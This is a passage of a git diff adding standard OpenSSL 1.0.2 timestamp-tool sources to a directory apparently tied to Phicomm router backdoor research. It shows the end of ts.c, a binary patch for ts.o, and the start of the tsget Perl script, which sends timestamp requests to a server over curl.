+        if (!(ctx = TS_VERIFY_CTX_new()))
+            goto err;
+        ctx->flags = TS_VFY_VERSION | TS_VFY_SIGNER;
+        if (data != NULL) {
+            ctx->flags |= TS_VFY_DATA;
+            if (!(ctx->data = BIO_new_file(data, "rb")))
+                goto err;
+        } else if (digest != NULL) {
+            long imprint_len;
+            ctx->flags |= TS_VFY_IMPRINT;
+            if (!(ctx->imprint = string_to_hex(digest, &imprint_len))) {
+                BIO_printf(bio_err, "invalid digest string\n");
+                goto err;
+            }
+            ctx->imprint_len = imprint_len;
+        }
+
+    } else if (queryfile != NULL) {
+        /*
+         * The request has just to be read, decoded and converted to a verify
+         * context object.
+         */
+        if (!(input = BIO_new_file(queryfile, "rb")))
+            goto err;
+        if (!(request = d2i_TS_REQ_bio(input, NULL)))
+            goto err;
+        if (!(ctx = TS_REQ_to_TS_VERIFY_CTX(request, NULL)))
+            goto err;
+    } else
+        return NULL;
+
+    /* Add the signature verification flag and arguments. */
+    ctx->flags |= TS_VFY_SIGNATURE;
+
+    /* Initialising the X509_STORE object. */
+    if (!(ctx->store = create_cert_store(ca_path, ca_file)))
+        goto err;
+
+    /* Loading untrusted certificates. */
+    if (untrusted && !(ctx->certs = TS_CONF_load_certs(untrusted)))
+        goto err;
+
+    ret = 1;
+ err:
+    if (!ret) {
+        TS_VERIFY_CTX_free(ctx);
+        ctx = NULL;
+    }
+    BIO_free_all(input);
+    TS_REQ_free(request);
+    return ctx;
+}
+
+static X509_STORE *create_cert_store(char *ca_path, char *ca_file)
+{
+    X509_STORE *cert_ctx = NULL;
+    X509_LOOKUP *lookup = NULL;
+    int i;
+
+    /* Creating the X509_STORE object. */
+    cert_ctx = X509_STORE_new();
+
+    /* Setting the callback for certificate chain verification. */
+    X509_STORE_set_verify_cb(cert_ctx, verify_cb);
+
+    /* Adding a trusted certificate directory source. */
+    if (ca_path) {
+        lookup = X509_STORE_add_lookup(cert_ctx, X509_LOOKUP_hash_dir());
+        if (lookup == NULL) {
+            BIO_printf(bio_err, "memory allocation failure\n");
+            goto err;
+        }
+        i = X509_LOOKUP_add_dir(lookup, ca_path, X509_FILETYPE_PEM);
+        if (!i) {
+            BIO_printf(bio_err, "Error loading directory %s\n", ca_path);
+            goto err;
+        }
+    }
+
+    /* Adding a trusted certificate file source. */
+    if (ca_file) {
+        lookup = X509_STORE_add_lookup(cert_ctx, X509_LOOKUP_file());
+        if (lookup == NULL) {
+            BIO_printf(bio_err, "memory allocation failure\n");
+            goto err;
+        }
+        i = X509_LOOKUP_load_file(lookup, ca_file, X509_FILETYPE_PEM);
+        if (!i) {
+            BIO_printf(bio_err, "Error loading file %s\n", ca_file);
+            goto err;
+        }
+    }
+
+    return cert_ctx;
+ err:
+    X509_STORE_free(cert_ctx);
+    return NULL;
+}
+
+static int MS_CALLBACK verify_cb(int ok, X509_STORE_CTX *ctx)
+{
+    /*-
+    char buf[256];
+
+    if (!ok)
+            {
+            X509_NAME_oneline(X509_get_subject_name(ctx->current_cert),
+                              buf, sizeof(buf));
+            printf("%s\n", buf);
+            printf("error %d at %d depth lookup: %s\n",
+                   ctx->error, ctx->error_depth,
+                    X509_verify_cert_error_string(ctx->error));
+            }
+    */
+
+    return ok;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.o
new file mode 100644
index 0000000000000000000000000000000000000000..4bceb2b1ba1af6008b3d3d9e1242754e5b6128ad
GIT binary patch
literal 24192
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%0DSVj3O<haiAT!fbyNf%
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
ZQGg{!cjz08T>4jCER?>@bTRAH|8KL1=(7L-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/tsget b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/tsget
new file mode 100644
index 0000000..0d54e9f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/tsget
@@ -0,0 +1,196 @@
+#!/usr/bin/perl -w
+# Written by Zoltan Glozik <zglozik@stones.com>.
+# Copyright (c) 2002 The OpenTSA Project.  All rights reserved.
+$::version = '$Id: tsget,v 1.1.2.2 2009/09/07 17:57:02 steve Exp $';
+
+use strict;
+use IO::Handle;
+use Getopt::Std;
+use File::Basename;
+use WWW::Curl::Easy;
+
+use vars qw(%options);
+
+# Callback for reading the body.
+sub read_body {
+    my ($maxlength, $state) = @_;
+    my $return_data = "";
+    my $data_len = length ${$state->{data}};
+    if ($state->{bytes} < $data_len) {
+	$data_len = $data_len - $state->{bytes};
+	$data_len = $maxlength if $data_len > $maxlength;
+	$return_data = substr ${$state->{data}}, $state->{bytes}, $data_len;
+	$state->{bytes} += $data_len;
+    }
+    return $return_data;
+}
+
+# Callback for writing the body into a variable.
+sub write_body {
+    my ($data, $pointer) = @_;
+    ${$pointer} .= $data;
+    return length($data);
+}
+
+# Initialise a new Curl object.
+sub create_curl {
+    my $url = shift;
+
+    # Create Curl object.
+    my $curl = WWW::Curl::Easy::new();
+
+    # Error-handling related options.
+    $curl->setopt(CURLOPT_VERBOSE, 1) if $options{d};
+    $curl->setopt(CURLOPT_FAILONERROR, 1);
+    $curl->setopt(CURLOPT_USERAGENT, "OpenTSA tsget.pl/" . (split / /, $::version)[2]);
+
+    # Options for POST method.
+    $curl->setopt(CURLOPT_UPLOAD, 1);
+    $curl->setopt(CURLOPT_CUSTOMREQUEST, "POST");
+    $curl->setopt(CURLOPT_HTTPHEADER,
+		["Content-Type: application/timestamp-query",
+		"Accept: application/timestamp-reply,application/timestamp-response"]);
+    $curl->setopt(CURLOPT_READFUNCTION, \&read_body);
+    $curl->setopt(CURLOPT_HEADERFUNCTION, sub { return length($_[0]); });
+
+    # Options for getting the result.
+    $curl->setopt(CURLOPT_WRITEFUNCTION, \&write_body);
+
+    # SSL related options.
+    $curl->setopt(CURLOPT_SSLKEYTYPE, "PEM");
+    $curl->setopt(CURLOPT_SSL_VERIFYPEER, 1);	# Verify server's certificate.
+    $curl->setopt(CURLOPT_SSL_VERIFYHOST, 2);	# Check server's CN.
+    $curl->setopt(CURLOPT_SSLKEY, $options{k}) if defined($options{k});
+    $curl->setopt(CURLOPT_SSLKEYPASSWD, $options{p}) if defined($options{p});
+    $curl->setopt(CURLOPT_SSLCERT, $options{c}) if defined($options{c});
+    $curl->setopt(CURLOPT_CAINFO, $options{C}) if defined($options{C});
+    $curl->setopt(CURLOPT_CAPATH, $options{P}) if defined($options{P});
+    $curl->setopt(CURLOPT_RANDOM_FILE, $options{r}) if defined($options{r});
+    $curl->setopt(CURLOPT_EGDSOCKET, $options{g}) if defined($options{g});
+
+    # Setting destination.
+    $curl->setopt(CURLOPT_URL, $url);
+
+    return $curl;
+}
+
+# Send a request and returns the body back.
+sub get_timestamp {
+    my $curl = shift;
+    my $body = shift;
+    my $ts_body;
+    local $::error_buf;
+
+    # Error-handling related options.
+    $curl->setopt(CURLOPT_ERRORBUFFER, "::error_buf");
+
+    # Options for POST method.
+    $curl->setopt(CURLOPT_INFILE, {data => $body, bytes => 0});
+    $curl->setopt(CURLOPT_INFILESIZE, length(${$body}));
+
+    # Options for getting the result.
+    $curl->setopt(CURLOPT_FILE, \$ts_body);
+
+    # Send the request...
+    my $error_code = $curl->perform();
+    my $error_string;
+    if ($error_code != 0) {
+        my $http_code = $curl->getinfo(CURLINFO_HTTP_CODE);
+	$error_string = "could not get timestamp";
+	$error_string .= ", http code: $http_code" unless $http_code == 0;
+	$error_string .= ", curl code: $error_code";
+	$error_string .= " ($::error_buf)" if defined($::error_buf);
+    } else {
+        my $ct = $curl->getinfo(CURLINFO_CONTENT_TYPE);
+	if (lc($ct) ne "application/timestamp-reply"
+	    && lc($ct) ne "application/timestamp-response") {
+	    $error_string = "unexpected content type returned: $ct";
+        }
+    }
+    return ($ts_body, $error_string);
+
+}
+
+# Print usage information and exists.
+sub usage {
+
+    print STDERR "usage: $0 -h <server_url> [-e <extension>] [-o <output>] ";
+    print STDERR "[-v] [-d] [-k <private_key.pem>] [-p <key_password>] ";
+    print STDERR "[-c <client_cert.pem>] [-C <CA_certs.pem>] [-P <CA_path>] ";
+    print STDERR "[-r <file:file...>] [-g <EGD_socket>] [<request>]...\n";
+    exit 1;
+}
+
+# ----------------------------------------------------------------------
+#   Main program
+# ----------------------------------------------------------------------
+
+# Getting command-line options (default comes from TSGET environment variable).
+my $getopt_arg =  "h:e:o:vdk:p:c:C:P:r:g:";
+if (exists $ENV{TSGET}) {
+    my @old_argv = @ARGV;
+    @ARGV = split /\s+/, $ENV{TSGET};
+    getopts($getopt_arg, \%options) or usage;
+    @ARGV = @old_argv;
+}
+getopts($getopt_arg, \%options) or usage;
+
+# Checking argument consistency.
+if (!exists($options{h}) || (@ARGV == 0 && !exists($options{o}))
+    || (@ARGV > 1 && exists($options{o}))) {
+    print STDERR "Inconsistent command line options.\n";
+    usage;
+}
+# Setting defaults.
+@ARGV = ("-") unless @ARGV != 0;
+$options{e} = ".tsr" unless defined($options{e});
+
+# Processing requests.
+my $curl = create_curl $options{h};
+undef $/;   # For reading whole files.
+REQUEST: foreach (@ARGV) {
+    my $input = $_;
+    my ($base, $path) = fileparse($input, '\.[^.]*');
+    my $output_base = $base . $options{e};
+    my $output = defined($options{o}) ? $options{o} : $path . $output_base;
+
+    STDERR->printflush("$input: ") if $options{v};
+    # Read request.
+    my $body;
+    if ($input eq "-") {
+	# Read the request from STDIN;
+	$body = <STDIN>;
+    } else {
+	# Read the request from file.
+        open INPUT, "<" . $input
